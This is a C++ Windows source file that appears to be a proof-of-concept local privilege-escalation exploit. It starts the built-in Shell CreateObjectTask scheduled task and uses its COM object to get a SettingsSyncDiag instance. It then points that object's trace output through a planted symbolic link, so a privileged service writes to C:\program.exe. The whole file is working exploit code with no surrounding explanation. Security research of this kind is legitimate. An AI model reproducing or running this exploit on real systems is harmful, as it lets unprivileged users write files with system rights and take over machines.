// CreateObjectTaskCPP.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <Propsys.h>
#include <comdef.h>
#include <vector>
#include <FileSymlink.h>
#include <FileOpLock.h>
#include <strsafe.h>
#include "proxy_h.h"
#include "ScopedHandle.h"

#pragma comment(lib, "rpcrt4.lib")
#pragma comment(lib, "taskschd.lib")

extern "C" STDAPI DllGetClassObject(REFCLSID rclsid, REFIID riid, LPVOID* ppv);

HRESULT RegisterPSObject(REFIID iid, DWORD *cookie) {
	HRESULT hr;	
	IUnknown *punk;
	hr = DllGetClassObject(iid, IID_IUnknown, (void **)&punk);
	if (FAILED(hr))
	    return hr;
	if (SUCCEEDED(hr)) {
	hr = CoRegisterClassObject(iid, punk, CLSCTX_INPROC_SERVER,
		REGCLS_MULTIPLEUSE, cookie);	
	}
	
	punk->Release();

	if (SUCCEEDED(hr))
	{
		hr = CoRegisterPSClsid(iid, iid);
	}

	return hr;	
}

class CoInitializer
{
public:

	CoInitializer(DWORD dwCoInit)
	{
		HRESULT hr = CoInitializeEx(NULL, dwCoInit);
		if (FAILED(hr))
		{
			throw _com_error(hr);
		}
	}

	~CoInitializer()
	{
		CoUninitialize();
	}
};

GUID CLSID_ShellCreateObject = { 0x135FD325, 0x45B7, 0x4C30, { 0x89, 0xF8, 0x43, 0x86, 0x96, 0x16, 0x69, 0xF0, } };
GUID CLSID_SettingsSyncDiag = { 0xDEEF2A9B, 0xB3B7, 0x46F2, { 0xA0, 0x7F, 0xD5, 0x33, 0x40, 0xBF, 0x9E, 0x0F, } };

#define REGINT(x) _COM_SMARTPTR_TYPEDEF(x, __uuidof(x))

REGINT(ITaskFolder);
REGINT(ITaskDefinition);
REGINT(IRegistrationInfo);
REGINT(IPrincipal);
REGINT(ITaskSettings);
REGINT(ITriggerCollection);
REGINT(ITrigger);
REGINT(IActionCollection);
REGINT(IRegistrationTrigger);
REGINT(ITaskService);
REGINT(IAction);
REGINT(IExecAction);
REGINT(IRegisteredTask);
REGINT(ICreateObject);
REGINT(ISettingsSyncDiag);
REGINT(IRunningTask);

void CheckHr(HRESULT hr)
{
	if (FAILED(hr))
	{
		throw _com_error(hr);
	}
}

IRegisteredTaskPtr GetRegisteredTask(bstr_t folder, bstr_t task)
{	
	ITaskServicePtr pService;
	HRESULT hr = CoCreateInstance(CLSID_TaskScheduler,
		NULL,
		CLSCTX_INPROC_SERVER,
		IID_PPV_ARGS(&pService));

	if (FAILED(hr))
	{
		printf("Failed to create an instance of ITaskService\n");
		throw _com_error(hr);
	}

	hr = pService->Connect(_variant_t(), _variant_t(),
		_variant_t(), _variant_t());
	if (FAILED(hr))
	{
		printf("ITaskService::Connect failed\n");
		throw _com_error(hr);
	}

	ITaskFolderPtr pRootFolder;
	hr = pService->GetFolder(folder, &pRootFolder);
	if (FAILED(hr))
	{
		printf("Cannot get Root Folder pointer\n");
		throw _com_error(hr);
	}

	IRegisteredTaskPtr pRegTask;

	hr = pRootFolder->GetTask(task, &pRegTask);
	if (FAILED(hr))
	{
		printf("Failed to get task\n");
		throw _com_error(hr);
	}

	return pRegTask;
}

void StartSystemTask()
{
	IRegisteredTaskPtr pRegTask = GetRegisteredTask(L"\\Microsoft\\Windows\\Shell", L"CreateObjectTask");
	
	IRunningTaskPtr pRunningTask;	

	HRESULT hr = pRegTask->Run(variant_t(), &pRunningTask);
	if (FAILED(hr))
	{
		printf("Failed to run task\n");
		throw _com_error(hr);
	}	
}

ICreateObjectPtr GetCreateObject()
{
	ICreateObjectPtr co;

	if (FAILED(CoCreateInstance(CLSID_ShellCreateObject, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&co))))
	{
		ScopedHandle hEvent(CreateEvent(nullptr, FALSE, FALSE, L"Global\\ShellCreateObjectTaskReadyEvent"), false);
		if (hEvent.IsValid())
		{
			// Start Task
			StartSystemTask();

			if (WaitForSingleObject(hEvent, 10000) == WAIT_OBJECT_0)			
			{
				CheckHr(CoCreateInstance(CLSID_ShellCreateObject, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&co)));
			}			
		}
		else
		{
			throw _com_error(E_FAIL);
		}
	}

	return co;
}

bstr_t GetRegString(HKEY hKey, LPCWSTR path, LPCWSTR value)
{	
	HKEY hCurr;
	LSTATUS status = RegOpenKeyEx(hKey, path, 0, KEY_QUERY_VALUE, &hCurr);
	if (status != 0)
	{
		throw _com_error(0x80070000 | status);
	}

	DWORD type;
	DWORD size;

	status = RegQueryValueEx(hCurr, value, nullptr, &type, nullptr, &size);

	if((status != ERROR_MORE_DATA) && (status != 0))
	{
		throw _com_error(0x80070000 | status);
	}

	std::vector<BYTE> str(((size + 1)&~1) + sizeof(WCHAR));

	size = (DWORD)str.size();
	status = RegQueryValueEx(hCurr, value, nullptr, &type, &str[0], &size);

	if (status != 0)
	{
		throw _com_error(0x80070000 | status);
	}

	return reinterpret_cast<WCHAR*>(&str[0]);
}

bstr_t GetSystemDrive()
{
	WCHAR buf[MAX_PATH];

	GetWindowsDirectory(buf, MAX_PATH);

	buf[2] = 0;

	return buf;
}

void DoWork()
{
	try
	{
		bstr_t systemdrive = GetSystemDrive();
		WCHAR path[260] = { 0 };
		DWORD cookie;

		StringCchPrintf(path, 260, L"%ls\\simplejunction", systemdrive.GetBSTR());
		
		bstr_t buildstr = GetRegString(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"BuildLabEx");

		bstr_t symlink = path;
		symlink += L"\\" + buildstr + L".SettingSync.etl";

		printf("%ls\n", symlink.GetBSTR());

		FileSymlink fs;

		if (!fs.CreateSymlink(symlink, systemdrive + L"\\program.exe", nullptr))
		{
			throw _com_error(E_FAIL);
		}

		CheckHr(CoInitializeSecurity(
			NULL,
			-1,
			NULL,
			NULL,
			RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
			RPC_C_IMP_LEVEL_IMPERSONATE,
			NULL,
			0,
			NULL));

		CheckHr(RegisterPSObject(__uuidof(ISettingsSyncDiag), &cookie));

		ICreateObjectPtr co = GetCreateObject();

		ISettingsSyncDiagPtr ssd;		

		CheckHr(co->CreateObject(CLSID_SettingsSyncDiag, nullptr, IID_PPV_ARGS(&ssd)));
		CheckHr(ssd->StartTracing());
		CheckHr(ssd->StopTracing(path));
	}
	catch (_com_error& e)
	{
		printf("%ls\n", e.ErrorMessage());
	}
}

int _tmain(int argc, _TCHAR* argv[])
{	
	CoInitializer c(COINIT_MULTITHREADED);

	DoWork();

	return 0;
}

